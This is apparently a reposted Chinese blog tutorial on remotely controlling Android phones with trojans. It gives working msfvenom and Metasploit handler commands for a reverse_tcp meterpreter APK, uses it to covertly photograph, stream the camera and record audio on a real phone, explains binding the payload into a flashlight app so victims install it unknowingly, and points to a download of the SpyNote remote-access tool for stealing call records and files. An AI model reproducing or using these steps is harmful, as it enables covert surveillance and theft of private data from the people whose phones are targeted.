Loading [MathJax]/jax/output/CommonHTML/config.js
前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
圈层
工具
发布
首页
学习
活动
专区
圈层
工具
MCP广场
社区首页 >专栏 >如何利用手机木马远程控制

如何利用手机木马远程控制

作者头像
知识与交流
发布于 2021-04-02 07:00:24
发布于 2021-04-02 07:00:24
9.3K1
举报
文章被收录于专栏:黑客技术家园黑客技术家园

1.实验涉及复现环境

  • Kali平台(Hack):192.168.0.101
  • Android模拟器(靶机1):192.168.0.106
  • Android魅族note2手机(靶机2):192.168.0.104
  • Java环境,.net环境构建 。(spyNote软件需要环境)

2.环境配置二Android模拟器

2.1首先从官网上下载雷电模拟器

2.2下载完后。点击.exe文件直接运行安装,运行,下一步,直接完成安装。

2.3 安装完成后在电脑桌面显示下面logo

2.4 对模拟器网络进行配置在右边的设置里面选择设置>网络设置>网络桥接模式开启,ip设置dhcp,最下面点击安装:

2.5 安装成功后显示安装成功:

3.生成后门

3.1打开虚拟机,启动kali,打开终端,生成apk后门。lhost为windows的ip(可以根据自己的IP设定),lport指定一个端口5001。打开终端输入命令:msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.0.101 lport=5001 R > /etc/222.apk

(生成apk文件)

3.2生成文件后我们到/etc/222.apk目录下拷贝我们的apk文件到我们的windows平台下然后启动我们的雷电模拟器,点击启动:

(启动界面)

3.3在右下角有个apk,点击选择文件安装。

3.4然后为了测试我们使用模拟器安装apk文件:

(成功安装木马文件)

4 使用metasploit控制台对模拟器进行攻击:

4.1 启动metasploit:

(启动界面)

4.2 使用模块:use exploit/multi/handler

(设置exploit)

4.3 设置模块set payload android/meterpreter/reverse_tcp

(paload设置)

4.4 设置攻击机和端口号和启动:

(参数配置)

4.5 显示正在监听靶机:

(监听中)

4.6 回到我们的模拟器靶机,我们点击运行我们安装的文件

(双击运行)

4.7 看到成功返回shell

(返回shell)

4.8 查看模拟手机的版本信息:sysinfo

(手机操作系统信息)

4.9 返回我们的模拟器,启动虚拟终端,查看攻击机和靶机的建立的联系:

(靶机被控的联系)

5 启用真机测试

5.1 步骤如以上环境,我在自己的手机上安装这个apk文件:

(note2手机安装)

5.2 按照上面获取shell的方法成功连接真机.:

(连接真机成功)

5.3 手机攻击演示:获取版本信息:

(手机版本信息)

5.4查看网络信息:(ifconfig)

(手机网络状态)

5.5查看root状态:

(显示手机未root)

5.6 启用网页视屏聊天:

(手机未找到合适的浏览器打开)

5.7查看手机有几个摄像头

(显示有2个)

5.8进行调用摄像头偷拍(默认前置摄像头):

5.9网页摄像机视屏流,显示实时画面能够调用摄像头,实时观看被攻击者的像机对着的物体,以下为通过此办法获取到的一段图片资料:

5.10 进行录音操作:

(成功录音并保存)

5.11 获得shell后有很多的攻击方法,我就不一一操作,将其汇总如下:

(网络和系统信息获取)

(系统命令执行和摄像头操作)

6 远控升级之捆绑app:

说明:现实生活中没有人会傻乎乎的下载个木马apk文件呀,所以我们的通过一些伪装的办法,将apk木马文件捆绑在用户常用的App上,诱导用户下载使用。步骤如下:先捋一下思路,把PAYLOAD小马注入到一个目标apk文件中,关键是要找到目标APK的入口,并把启动payload小马的代码添加进去,随目标APK一起启动,从而实现监听手机的目的。当然前提是apk文件可逆。这里使用注入目标apk文件:手电筒—-魅族市场下载的(名为shoudiantong.apk)。我们使用上文攻击魅族手机用到的222.apk文件。

6.1 反编译payload小马222.apk和shoudiantong.apk(说明:反编译软件kali系统中自带,以下操作在windows,所以需要下载一个apktool。

命令:

apktool d houmen.apk

apktool d shoudiantong.apk

(反编译生成两个新文件)

6.2 开始寻找手电筒shoudiantong.apk文件的入口,在手电筒shoudiantong的Manifest.xml文件中查找Main和Launch关键词,定位到所对应的启动smail文件

6.3 直接搜索onCreat函数,找到bundle对象,你并在下面添加启动paload添加如下代码:(改动文件:MainActivety.smail)

6.4 点击保存之后呢,我们还要把刚才反编译的payload文件中的smail代码复制过来,把payload的smail/com/metasploit文件复制到手电筒的smail/com/目录下。

6.5 回编译:apktool b shoudiantong.apk

6.6 签名,这一部需要完成,发现没有签名的apk文件安装时会解析错误,生成KEYSTORE:keytool -genkey -v -keystore mykey.keystore -alias alias_name -keyalg RSA -keysize 1024 -validity 22222因为我在本机没有这个工具,所以在kali系统完成:

6.7 给shoudiantong.apk签名:

6.8 Shoudiantong.apk木马文件测试,将手电筒apk文件装在手机上:

6.9 打开并正常使用完全没问题:

7 进行手机攻击

7.1 查看手机与攻击机建立的联系

7.2 试着操作一些上述没有操作过的命令试试:

7.3 查看路由信息:

7.4 ps查看进程:

8 总结:

通过对手机木马文件对手机的植入,我们可以成功的对手机进行控制,其中包括对手机使用者进行录音、拍照、查看下载手机私密文件,获取手机网络信息,进程信息等。实现对手机的完全控制。本文简单介绍如何将木马文件绑定到正常app实现对受害者攻击,其实还有很多办法,如通过中间人、钓鱼实现木马植入等。

9 图形界面控制软件SpyNote的使用:

10 环境配置三java环境和.net环境:

  • 首先进入点击打开链接下载。
  • 下载后得到exe文件,直接运行
  • 出现以下画面,点击安装,下一步既可以完成安装:
  • 安装完成后,打开cmd,输入java-version出现版本号,说明安装成功:
  • .net环境安装:进入微软官网。(为避免木马、病毒等隐患,我们尽量从官网下载程序文件)
  • 在搜索框中输入Microsoft .NET Framework,选择【搜索microsoft.com】,点击【搜索】按钮。
  • 返回搜索结果,我们选择第2项【Download Microsoft .NET Framework 4(独立安装程序)】链接点击进入.
  • 打开软件的下载页面,点击【下载】 弹出下载窗口,选择保存位置。
  • 下载完成后,双击运行下载的文件。
  • 和安装其他软件一样,依次点击【下一步】,直至安装完成。这时.net运行环境安装完毕,就可以运行之前无法打开的EXE程序文件了

11 spynote安装使用

11.1百度搜索“spynote下载”找到相应的安装包,或者访问地址:(http://www.rekings.com/spynote-v5-android-rat/)进行下载下载后使用解压密码:rekings.com打开:

11.2 双击运行软件出现以下界面填写一个大于1023的端口,默认2222

(填写端口)

11.3配置生成木马apk文件我这里配置端口:222我们的攻击机为:192.168.0.100也就是我计算机的ip,然后应用的名字test,点击上方的build就可以生成文件:

11.4演示过程涉及一些个人隐私,所以在演示的过程中我们用上面实验中用到的手机模拟器来代替打开我们的雷电模拟器,点击右下角的apk安装,把我们生成的apk文件安装(test.apk文件默认放在C:\Administrator\output):

(安装apk文件)

12 攻击演示:

12.1 回到spyNote软件,我们发现有一台机器成功上线:

12.2 在设备上右击选择 tools P依次有一些命令执行:

(攻击方式)

12.3 我们选择tools p>record calls得到手机的通话记录

(通话记录)

12.4 我们选择tools p>record calls得到手机的通话记录install aplications查看手机的安装的应用软件:

(安装的软件)

12.5 我们选择tools p>file managerke可以查看手机里面的文件,可以任意下载,拷贝,删除等等。

(文件管理)

12.6 我们选择tools p>romote commands可以进行远程终端管理:

(远程终端管理)

13 总结:

功能太多,不一一演示,其中还包括照相、监听电话声音、查看通讯录、发送短信等等一些功能,等于自己手机咯都不用买手机

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-12-20,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 黑客技术家园 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
1 条评论
热度
最新
网盘挂了
网盘挂了
回复回复点赞举报
推荐阅读
编辑精选文章
换一批
Kali利用Android木马渗透手机(高级篇)
选择网关 add to target 1 选择目标 add to target 2
院长技术
2021/02/19
18.2K0
Kali利用Android木马渗透手机(高级篇)
EternalBlue【永恒之蓝】漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!
Meterpreter的功能丰富,例如添加用户、隐藏某些内容、打开shell、获取用户密码、上传和下载远程主机的文件、运行cmd.exe、捕捉屏幕、获取远程控制权、捕获按键信息、清除应用程序、显示远程主机的系统信息、显示远程机器的网络接口和IP地址等。此外,Meterpreter可以躲避入侵检测系统,在远程主机上隐藏自己,不改变系统硬盘中的文件,因此HIDS(基于主机的入侵检测系统)很难对它做出响应。
用户8909609
2023/12/27
16.1K0
EternalBlue【永恒之蓝】漏洞详解(复现、演示、远程、后门、入侵、防御)内容丰富-深入剖析漏洞原理-漏洞成因-以及报错解决方法-值得收藏!
如何手动注入Payload后门到安卓APK文件并维持访问
声明:本文内容可能具有攻击性,只供安全研究和警示作用,请勿用于非法用途,非法使用后果与我无关。 本人小白一枚,前段时间看到@鸢尾 大神写的文章《如何用kwetza给安卓应用加后门》。大神自己写的自动化注入工具,看过程也并不困难,我就产生了自己手动注入的想法,折腾了一天终于搞定了。 当然已经有有好多的自动化注入工具可以使用了,我先总结一下: 1.backdoor-apk :https://github.com/dana-at-cp/backdoor-apk 2. spade: https://githu
FB客服
2018/02/24
5.5K1
如何手动注入Payload后门到安卓APK文件并维持访问
使用Kali生成木马入侵安卓手机
然后输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=你kali的ip LPORT=5555 R > /root/apk.apk
知识与交流
2023/03/25
7.3K5
使用Kali生成木马入侵安卓手机
如何通过命令入侵安卓手机
首先,我用的靶机是魅蓝2,对其网络使用静态ip:xxx.xxx.xxx.aaa,“x”是需要对应入侵机的ip,“a”则是没用过的0-255随便输
知识与交流
2021/04/02
3.3K0
如何通过命令入侵安卓手机
kali Linux外网渗透控制Android安卓手机系统。
就是我们穿透去公网并且公网穿透连接本地Ip---->监听本地IP ---->目标点击.exe--->
知识与交流
2024/03/11
1.4K0
kali Linux外网渗透控制Android安卓手机系统。
Billu_b0x靶机渗透
得到IP后,访问网页,发现只有登录框,没有什么意外的东西,扫描一下后台目录,看看有没有什么文件可利用的,扫描完后,发现有一堆php,同时还有一个phpmy(phpmyadmin)的网页
Elapse
2020/08/17
6530
如何使用SET指令远程木马
5. 输入ip地址(监听的主机ip,kali的ip地址)和端口(随机,只要不被占用即可)
知识与交流
2023/09/05
3880
如何使用SET指令远程木马
APP渗透
jeb 安卓反编译工具,用于逆向工程或审计APK文件,可以提高效率减少许多工程师的分析时间,能将Dalvik字节码反编译为Java源代码
用户2700375
2022/06/09
1.1K0
APP渗透
后渗透学习笔记(一)
攻陷了服务器,主机取得一定权限(可能不是很高)就开始进入了后渗透阶段 把对方机器打蓝屏重启有什么作用? 使得我们修改注册表等配置信息可以生效 windows的控制权限UAC,重启才可以生效,可以使用远程溢出蓝屏,用户可能会以为是bug,意外情况,所以不会注意,从而使修改信息生效 1.权限提升:权限提升的几种方式 (1)利用更高权限的进程进行操作,获得会话session (2)windows下的用户控制,exe执行时弹出的框问你是否要执行,这个东西就是UAC (3)利用服务器里面的本地提权漏洞进行权限提升(会在msf中)
字节脉搏实验室
2020/03/08
3.2K0
内网渗透|内网远程控制总结
前言 在内网渗透过程中,会碰到远程控制soft或者其他,这里针对远程控制软件做如下总结。 远程控制软件 向日葵篇 向日葵查看版本 向日葵(可以攻击) 针对向日葵的话其实如果有本地安装的话,是...
亿人安全
2023/08/10
7230
内网渗透|内网远程控制总结
渗透测试|生成安卓手机的反弹Shell APK木马文件
var xhr = new XMLHttpRequest(); xhr.open('get', 'https://v1.hitokoto.cn/'); xhr.onreadystatechange = function () { if (xhr.readyState === 4) { var data = JSON.parse(xhr.responseText); var hitokoto = document.getElementById('hitokoto'); hitokoto.innerText = data.hitokoto; } } xhr.send();
TRY博客-简单的网络技术
2022/09/08
1.6K0
渗透测试|生成安卓手机的反弹Shell APK木马文件
Hacker基础之工具篇 apktool
apktool apktool是一个用于第三方封闭的二进制Android应用程序逆向工程工具 它可以将资源解码为几乎原始的形式,并在进行一些修改后重建它们; 它可以逐步调试小代码, 由于类似项目的文件
用户1631416
2018/04/17
1.9K0
Hacker基础之工具篇 apktool
msf之木马程序
这里使用的是Kali linux虚拟机 攻击机ip是192.168.0.108 靶机ip是192.168.177.134
宸寰客
2020/09/18
2K0
msf之木马程序
如何使用Kali生成木马入侵安卓手机
版本阶段构建一个简单的工具来生成后门和简单的工具来张贴攻击攻击,如浏览器攻击,DLL。该工具使用流行的有效负载编译恶意软件,然后编译后的恶意软件可以在windows,android,mac上执行。使用此工具创建的恶意软件也有能力绕过大多数AV软件保护。TheFatRat安装好后如下图所示
知识与交流
2021/04/02
6.8K1
如何使用Kali生成木马入侵安卓手机
如何攻击同一局域网的其他设备
2、在 Kali 终端输入以下命令在 Kali 虚拟机/root路径下生成远控文件520.apk:
知识与交流
2021/04/02
6.9K0
如何攻击同一局域网的其他设备
内网靶场初探
内容写的很乱,因为第一次搞,有点不太熟练,所以各位师傅简单看看就好,写的比较好的文章,可以参考这两个 https://xz.aliyun.com/t/11588#toc-0 https://mp.weixin.qq.com
用户9691112
2023/05/18
7210
内网靶场初探
黑客玩具入门——4、漏洞扫描与Metasploit
Legion是Sparta的一个分支,它是一个开源的、易于使用的、超级可扩展的、半自动的网络渗透测试框架。它是一款Kali Linux系统默认集成的Python GUI应用程序工具。Legion是一个Nmap、Nikto、Hydra等工具的集合,利用各个工具的优秀功能,完成收集信息、扫描和爆破等任务。
zaking
2023/12/01
2.6K0
黑客玩具入门——4、漏洞扫描与Metasploit
如何使用Metasploit对安卓手机进行控制
文章内容可能具有一定攻击性,本文仅供技术交流,如有非法使用后果自负。 在这次的实验中,我会使用kali linux和安卓模拟器演示如何使用Metasploit框架控制Android设备。 创建负载
FB客服
2018/02/08
4K0
如何使用Metasploit对安卓手机进行控制
从挖矿木马看后渗透维权
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。 雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。
安恒网络空间安全讲武堂
2019/10/16
2.4K0
从挖矿木马看后渗透维权
相关推荐
Kali利用Android木马渗透手机(高级篇)
更多 >
领券
💥开发者 MCP广场重磅上线!
精选全网热门MCP server,让你的AI更好用 🚀
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档